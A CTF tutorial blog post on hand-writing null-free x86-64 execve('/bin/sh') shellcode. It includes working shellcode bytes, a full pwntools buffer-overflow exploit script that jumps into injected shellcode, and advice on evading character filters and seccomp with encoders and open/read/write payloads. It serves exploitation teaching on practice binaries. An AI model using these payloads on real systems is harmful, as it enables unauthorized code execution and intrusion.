June 7, 2026

Writing x86-64 Shellcode for CTF: From Syscall to Shell

Hand-write null-free x86-64 execve('/bin/sh') shellcode from scratch, fire it with pwntools, and debug it in GDB. The syscall is easy. Surviving the filter is the craft.

Shellcode is not magic

The first time I saw a line of shellcode, I assumed you needed a special tool to make it. It looks like noise. \x48\x31\xf6\x56\x48\xbf... is not a thing a person types, surely. Someone generated that. There's a machine somewhere that knows the secret.

There isn't. Shellcode is the most honest code in all of exploitation, and you can write it by hand in an afternoon. It is just machine code: the same instructions your CPU runs all day, except you are injecting them into a program that did not plan to run your instructions. The classic goal is to spawn a shell, which is where the name comes from. As Wikipedia puts it, the term "includes shell because the attack originally described an attack that opens a command shell". You overflow a buffer, you point the instruction pointer at your bytes, the CPU runs them, and you get a /bin/sh prompt on a machine that was never supposed to give you one.

Here is the thing that bugs me about how shellcode gets taught. It gets treated as the hard, scary part of binary exploitation, the dark art at the bottom of the stack. It is the opposite. The syscall is easy. You will understand it in the next five minutes. The actual difficulty is everything the CTF does to stop your bytes from arriving intact: null bytes that truncate your payload, length caps, character filters, a stack the kernel refuses to execute. That is the craft, and almost none of it is the assembly.

The syscall is the easy twenty-three bytes. The craft is getting those bytes to survive the trip.

This post is the missing piece under two others on this site. The Buffer Overflow guide gets you control of the instruction pointer, and the ROP guide is what you reach for when you cannot inject code. Both lean on shellcode without ever teaching it. By the end here you will be able to hand-write a null-free execve("/bin/sh"), fire it with pwntools, and step through it in GDB (the GNU Debugger) when it inevitably crashes the first time. We'll target Linux x86-64, because that is what almost every modern pwn challenge ships.

A shell is one syscall

Start with the only idea you actually need. To run a program on Linux, you call one syscall: execve. Its man page signature is execve(const char *pathname, char *const argv[], char *const envp[]). To spawn a shell, you want execve("/bin/sh", NULL, NULL). On Linux that is legal: the man page says a NULL argv and envp behave "the same effect as specifying the argument as a pointer to a list containing a single null pointer." A shell with no arguments and no environment. That is all we want.

So the whole job is: put the right values in the right registers, then execute the syscall instruction. On x86-64, the kernel reads syscall arguments from a fixed set of registers. This table is the entire contract you program against, and it is worth memorizing because you will use it constantly:

RegisterHoldsFor execve
raxSyscall number59 (0x3b)
rdiArgument 1pointer to "/bin/sh"
rsiArgument 2argv = 0 (NULL)
rdxArgument 3envp = 0 (NULL)
r10, r8, r9Arguments 4, 5, 6unused here

One detail that trips people up: the fourth argument lives in r10, not rcx. Regular function calls use rcx for the fourth argument, but the syscall instruction clobbers rcx and r11 for its own bookkeeping (it stashes the return address and flags there), so the kernel ABI (Application Binary Interface) substitutes r10. You can read this straight off the syscall(2) man page. You don't need r10 for a shell, but the day you write an open/read/write chain, that is the footgun waiting for you.

Warning: The syscall numbers are architecture-specific. On x86-64, execve is 59. On 32-bit i386 it is 11, passed in eax via int 0x80 instead of syscall. If you copy a 32-bit tutorial and write mov al, 11 on a 64-bit target, you do not get a shell. You call syscall 11, which is munmap, and your process unmaps its own memory and dies. I have done this. It is a confusing five minutes. The authoritative number lives in the kernel's syscall_64.tbl, or the searchable Filippo Valsorda table.

Your first shellcode, the version that doesn't work

Two facts about the stack first, because the whole payload leans on them. The stack is just a region of scratch memory the program already gave us, and it grows downward: each push moves the stack pointer (rsp) to a lower address and writes there. So whatever you push last sits at the lowest address, and the thing you pushed before it sits just above. Hold onto that.

We can't point at a "/bin/sh" string that does not exist in the binary, so we build it ourselves. The trick is to treat the seven characters as the bytes of a number and push that number. On a little-endian machine the first character ends up in the lowest byte, so "/bin/sh" plus a null terminator becomes the 64-bit immediate 0x0068732f6e69622f (read it right to left: 2f is /, 62 is b, and so on, with the leading 00 as the terminator). Push that, point rdi at it, set the other registers, and fire. pwntools assembles the text for us so we can read the bytes in hex. (If pwntools is new, the pwntools guide covers the basics.)

from pwn import *
context.arch = 'amd64'
sc = asm('''
mov rdi, 0x0068732f6e69622f /* '/bin/sh\0' little-endian */
push rdi
mov rdi, rsp /* rdi -> the string on the stack */
mov rsi, 0 /* argv = NULL */
mov rdx, 0 /* envp = NULL */
mov rax, 59 /* execve */
syscall
''')
print(sc.hex(), len(sc))

This is correct assembly. It would work if you could deliver it cleanly. Run it and look at the bytes, though, and you can already see the problem:

$ python3 first_try.py
48bf2f62696e2f73680048...c6000000... (33 bytes)
^^ ^^^^^^
a null byte four more null bytes from 'mov rsi, 0'

Two things are wrong, and both are about the bytes, not the logic. "/bin/sh" is seven characters, but mov rdi, imm64 wants a full eight-byte immediate, so the assembler pads it with a 0x00 for the string terminator. And mov rsi, 0 encodes the literal value zero as four null bytes. Same for mov rdx, 0 and the upper bytes of mov rax, 59. The shellcode is riddled with 0x00. Why does that matter? Because of how it gets delivered.

The null bytes that quietly kill your shellcode

Your shellcode does not teleport into the target. It travels through an input function, and most of the input functions that give you an overflow in the first place treat your bytes as a C string. strcpy copies until it hits a 0x00 and then stops. gets and scanf("%s") stop on whitespace too. So if your shellcode contains a null byte at offset 9, the program copies the first nine bytes and throws the rest away. You jump to a beautiful payload that got guillotined before it arrived.

The fix is a small set of encoding tricks. None of them are clever, exactly. They are just the habits of someone who has been bitten enough times. Here are the three that matter most, drawn from abatchy's shellcode reduction notes:

  1. Zero a register with xor, not mov. mov rsi, 0 encodes the zero literally: null bytes. xor rsi, rsi produces the same result, costs two bytes (48 31 f6 for the 64-bit form, or just 31 f6 via the 32-bit subregister), and contains no null. A register xored with itself is always zero.
  2. Write small numbers into the small register. mov rax, 59 sets the full 64-bit register, so the encoding carries seven leading zero bytes. mov al, 59 writes only the low 8 bits and encodes as b0 3b: one opcode, one value, no null. (Better still, push 59; pop rax, which also clears the upper bits cleanly.)
  3. Use the "/bin//sh" trick for the string. The doubled slash pads "/bin/sh" to exactly eight bytes, so it fills one register with no terminator and no null byte inside the immediate. The kernel collapses redundant slashes during path resolution, so "/bin//sh" runs the exact same program as "/bin/sh".

That last one is my favorite hack in all of exploitation. The path resolver was always going to flatten // into /, and someone realized you could lean on that to dodge a null byte for the cost of a single character.

Note: Null is the most common bad byte, but it is not the only one. If your input goes through a line reader, 0x0a (newline) and 0x0d (carriage return) will also truncate or mangle the payload. The general technique is bad-character discovery: send a sequence of every byte from 0x01 to 0xff, trigger the crash, and compare what landed in memory against what you sent. Any byte that got dropped or changed is a byte your final shellcode must avoid.

The 23-byte execve, one byte at a time

Apply all three tricks and you converge on the shellcode that has been copy-pasted into a thousand exploits. The commonly cited version is 23 bytes (this exact one is Exploit-DB 46907). It is worth typing out and understanding, because once you see why each instruction is there, you can rebuild it from memory and adapt it when a constraint forces a change.

; execve('/bin//sh', NULL, NULL) -- 23 bytes, no null bytes
48 31 f6 xor rsi, rsi ; rsi = 0 (argv = NULL, and a terminator)
56 push rsi ; push 8 null bytes: the string's \0 terminator
48 bf 2f62696e2f2f7368 mov rdi, '/bin//sh' ; the 8-byte string, no null inside
57 push rdi ; '/bin//sh' now sits on the stack
54 push rsp ; push the address of the string
5f pop rdi ; rdi -> '/bin//sh'
6a 3b push 0x3b ; 0x3b = 59
58 pop rax ; rax = 59 (execve), upper bits cleared
99 cdq ; rdx = 0 (envp = NULL) via sign-extend
0f 05 syscall ; go

Read it top to bottom. We zero rsi and push it first. Because the stack grows down, that block of zeros ends up just above the string we push next, which gives the string its \0 terminator for free (and rsi stays 0 for our NULL argv). Then we load "/bin//sh" into rdi and push it, so now rsp points right at the string. We copy that address into rdi with push rsp; pop rdi (two bytes; mov rdi, rsp would also work and is null-free, but the push/pop pair is one byte shorter and the habitual way to do it). We set rax to 59 with another push/pop. The one instruction that always looks like a typo is cdq (one byte, 0x99): it sign-extends eax into edx, and since eax is the small positive number 59, the sign bit is 0, so edx becomes 0. Writing edx zeroes the whole of rdx for free. One byte to set envp = NULL. That is the kind of detail that makes hand-written shellcode shorter than anything a tool emits.

Every byte in that block earns its place. It is the shortest correct program most people will ever write.
Tip: You do not have to memorize the hex. You memorize the shape: zero the string terminator, build the string, point rdi at it, set rax to 59, zero rsi and rdx, syscall. If you can recite the shape, pwntools or even nasm will produce the bytes for you, and you will recognize when they look wrong.

The other way it fails: a stack that refuses to run code

Suppose your 23 bytes arrive perfectly intact and you jump to them. On a modern system, nothing happens except a crash. That is NX (No-eXecute), also called DEP (Data Execution Prevention): the kernel marks the stack and other data pages non-executable, and the CPU faults the instant it tries to fetch an instruction from one. Code goes in code pages, data goes in data pages, and your shellcode is data sitting on the stack.

Compilers turn this on by default. GCC emits a program header called PT_GNU_STACK marked non-executable, and the kernel honors it (you can see pwntools check exactly this in its ELF.nx property). So the first thing to do with any pwn binary is run checksec:

$ checksec --file=./vuln
RELRO STACK CANARY NX PIE
Partial No canary NX disabled No PIE
^^^^^^^^^^^^
executable stack: ret2shellcode is on the table

If checksec says NX disabled, the stack is executable and you can drop shellcode straight onto it and jump in. A challenge author makes that happen with gcc -z execstack, or by shipping an object that lacks the .note.GNU-stack marker. When you see it, the author is telling you: this is a shellcode challenge. If NX is enabled, the stack is dead to you, and you have three options: find an mmap'd region the program made executable for you, use a jmp rsp style trampoline into memory that already executes, or give up on injection entirely and switch to return-oriented programming, which reuses code that is already there.

Key insight: NX is the single biggest reason a beginner's shellcode "doesn't work" when the bytes are perfect. Always checksec first. If NX is on, no amount of fixing your assembly will help, because the problem was never your assembly. Pick a different technique.

Firing it with pwntools (and why you still learn the hard way)

Now the honest part, and it is the whole reason this post exists: pwntools can generate shellcode for you, but what it generates is the floor of what you can do, not the ceiling. In a real CTF you will usually not type out 23 bytes of hex. There is a code generator called shellcraft that hands you working shellcode for dozens of operations. The shell is one line:

from pwn import *
context.arch = 'amd64'
# print the assembly shellcraft would use:
print(shellcraft.amd64.linux.sh())
# get the runnable bytes:
sc = asm(shellcraft.amd64.linux.sh())
print(len(sc), 'bytes')

So why did we just spend a whole post hand-writing it? Because shellcraft's output is bigger than the hand-rolled 23 bytes, it can contain bytes your filter rejects, and when it does not fit or does not work, you have to know why to fix it. Tools encode the what. Hand-rolling teaches you the why, and the why is what lets you repair tool output the moment a challenge breaks it.

Here is the full delivery for a non-NX overflow: find the offset to the saved return address with a cyclic pattern, write your shellcode somewhere you know the address of, and overwrite the return address to jump to it.

from pwn import *
context.binary = elf = ELF('./vuln') # sets context.arch automatically
# 1) find the offset to saved RIP with a unique pattern
io = process('./vuln')
io.sendline(cyclic(200))
io.wait()
core = io.corefile # core dump from the crash
offset = cyclic_find(core.fault_addr) # where our pattern hit RIP
log.info('offset = %d', offset)
# 2) build the payload: shellcode + padding + return into the shellcode
sc = asm(shellcraft.amd64.linux.sh())
buf = elf.symbols['buffer'] # address shellcode lands at (non-PIE)
payload = sc.ljust(offset, b'\x90') + p64(buf) # NOP-pad up to RIP, then jump back
io = process('./vuln')
io.sendline(payload)
io.interactive() # enjoy your shell

The cyclic and cyclic_find pair is pure pwntools convenience: cyclic(200) generates a 200-byte De Bruijn sequence where every 4-byte window is unique, so the controlled value that overwrote the return address (pwntools hands it to you as core.fault_addr) maps back to one exact offset. The b'\x90' padding is a NOP sled (NOP is the no-operation instruction, 0x90): a runway of do-nothing bytes so that if your jump address is slightly off, execution slides down the NOPs into your real shellcode instead of crashing next to it.

When it crashes anyway: debugging shellcode in GDB

It will crash the first time. It always does. The difference between someone who can write shellcode and someone who gets stuck is entirely about what they do next, and the answer is never "stare at the Python harder." You open a debugger and watch the bytes. The GDB CTF guide covers the full workflow; here is the shellcode-specific loop.

Attach GDB (I strongly recommend the pwndbg plugin, which prints registers and disassembly on every stop), break at the moment of the crash, and ask three questions in order:

  1. Did my whole payload arrive? x/24bx $rsp (or wherever your buffer is). Compare the bytes in memory to the bytes you sent. If it stops short, you have a bad byte that truncated it. Go back to the null-byte tricks.
  2. Am I even executing my bytes? Set a breakpoint on the buffer address and confirm rip reaches it. If it never does, your offset or return address is wrong, or NX faulted you before the first instruction. info proc mappings shows whether the page you jumped to is executable.
  3. Where exactly does it die? stepi one instruction at a time through your shellcode, watching the registers after each step. The crash will land on a specific instruction, and the register state right before it tells you what assumption was wrong.
Do not guess. Single-step the bytes and watch the registers. Shellcode is short enough that you can step the entire thing in under a minute, and the crash always explains itself.
Warning: A myth worth killing, because it costs people hours: the famous "add an extra ret for 16-byte stack alignment" rule does not apply to raw shellcode. That movaps crash comes from glibc functions like system that are compiled with SSE and assume the stack is 16-byte aligned at a call. It is a ret2libc problem. A pure execve syscall never executes those glibc prologues, so alignment is simply not your bug. If your raw shellcode dies, it is a bad byte, a non-executable page, or a wrong address. Not alignment. It is probably the single most common wrong turn in shellcode debugging, so cross it off the list first.

What CTFs do to make this genuinely hard

If every challenge let you drop 23 clean bytes onto an executable stack, shellcode would be a solved problem and nobody would write challenges about it. The interesting ones attack the delivery channel. Here are the constraints you will actually meet, roughly in order of how often they show up.

1. Bad characters

Null is just the start. A filter might strip newlines, reject anything above 0x7f, or ban specific bytes. Find them with a byte-by-byte diff, then rewrite the offending instructions or run the payload through an encoder.

2. Length caps

When the buffer holds only 20-something bytes, the 23-byte hand-rolled execve is your friend and the bloated shellcraft output is not. This is exactly when hand-writing pays for itself.

3. seccomp

A seccomp filter can ban execve outright. Then a shell is impossible, and you pivot to open + read + write to read the flag file directly.

Printable and alphanumeric shellcode. Some filters only accept printable ASCII, or even only letters and digits. You cannot express syscall (0f 05) in printable bytes, so the trick is a decoder stub: a small chunk written entirely in printable opcodes that, at runtime, writes the real shellcode into memory and jumps to it. You rarely build these by hand. Real tools do it: ae64 for x86-64, SkyLined's alpha3 (and alpha2), and msfvenom's x86/alpha_mixed encoder. Knowing they exist, and that they need a register pointing near your payload, is usually enough.

seccomp, concretely. When a binary installs a seccomp-bpf filter, dump it with seccomp-tools so you can read exactly which syscalls are allowed:

$ seccomp-tools dump ./vuln
line CODE JT JF K
...
0005: if (A != execve) goto 0007
0006: return KILL # execve is banned, no shell for you
0007: return ALLOW # open / read / write still allowed

That output is a gift. It tells you the shell is off the table and the open/read/write path is open, so you write shellcode that opens the flag file, reads it into a buffer, and writes it to stdout. Same skill, different syscall numbers (open is 2, read is 0, write is 1), same register table from the top of this post.

Note: One beautiful constrained example: picoCTF 2021 Filtered Shellcode inserts two 0x90 NOP bytes after every two bytes of your input. The fix is to write your shellcode as a sequence of two-byte instructions, so the injected NOPs land harmlessly between your real instructions instead of corrupting them. That is shellcode as a genuine puzzle, and it only makes sense once you understand the bytes.

picoCTF challenges to practice on

Reading shellcode is not the same as landing one. Go break these, in roughly this order:

  • picoCTF 2021 Binary Gauntlet 1 is the cleanest possible ret2shellcode. NX is off, the program prints the buffer address, you write shellcode there and overflow the return address to jump to it. If you only do one, do this.
  • picoCTF 2021 Binary Gauntlet 2 is the same idea with a remote-reliability twist: solvers added a NOP slide before the shellcode so the jump did not have to be byte-perfect.
  • picoCTF 2021 Filtered Shellcode is the NOP-injection puzzle from the callout above. It forces you to think about instruction-level byte layout, which is the real lesson.
  • picoCTF 2025 Handoff combines a stack pivot with shellcode because the initial overflow window is too small for a full payload. Good bridge between this post and the ROP ladder.

If you want the history, read Aleph One's 1996 paper "Smashing the Stack for Fun and Profit", which introduced injected stack shellcode. His line still sums up the whole game: "In most cases we'll simply want the program to spawn a shell. From the shell we can then issue other commands as we wish." Thirty years later, that is still exactly what those 23 bytes do. For a browsable library of shellcodes by architecture, the shell-storm database and Exploit-DB are the standard references.

Quick reference

The decision order for a shellcode challenge

  1. checksec ./vuln. Is NX off? If yes, ret2shellcode is live. If no, switch to ROP.
  2. Find the input function. strcpy/gets/scanf means no null bytes (and maybe no newlines) allowed.
  3. Is there a length cap? If tight, hand-roll the 23-byte execve. If roomy, use asm(shellcraft.amd64.linux.sh()).
  4. Is there a charset filter? Run the payload through ae64 / alpha3 / msfvenom.
  5. seccomp-tools dump ./vuln. If execve is banned, write open/read/write instead.
  6. It crashes. Open GDB, check the bytes arrived, check the page is executable, stepi to the dying instruction.

Syscall numbers (x86-64) and the register table

rax = number rdi = arg1 rsi = arg2 rdx = arg3 r10 = arg4 r8 = arg5 r9 = arg6
execve = 59 (0x3b) read = 0 write = 1 open = 2 rt_sigreturn = 15
(32-bit i386 is different: execve = 11, via int 0x80. Do not mix them up.)

pwntools cheat sheet

context.arch = 'amd64' # or context.binary = ELF('./vuln')
sc = asm(shellcraft.amd64.linux.sh()) # ready-made shell shellcode
print(shellcraft.amd64.linux.sh()) # see the assembly it used
off = cyclic_find(core.read(core.rsp, 8)) # offset to saved RIP
payload = sc.ljust(off, b'\x90') + p64(buf) # NOP-pad, then jump to the shellcode
io.interactive() # shell

The bytes were never magic. They are a syscall number, three registers, and a handful of tricks to keep null bytes out. Everything that feels hard about shellcode is the channel, not the code: whether your bytes arrive whole, whether the page they land on is allowed to run, whether a filter ate them on the way in.

One concrete move to make this stick. Find a binary with an executable stack (or compile one with gcc -z execstack -fno-stack-protector vuln.c -o vuln) and write the 23-byte execve from memory. Run it under strace and watch the execve("/bin//sh", NULL, NULL) line appear. The moment you see your own bytes turn into that syscall, the mystery is gone for good.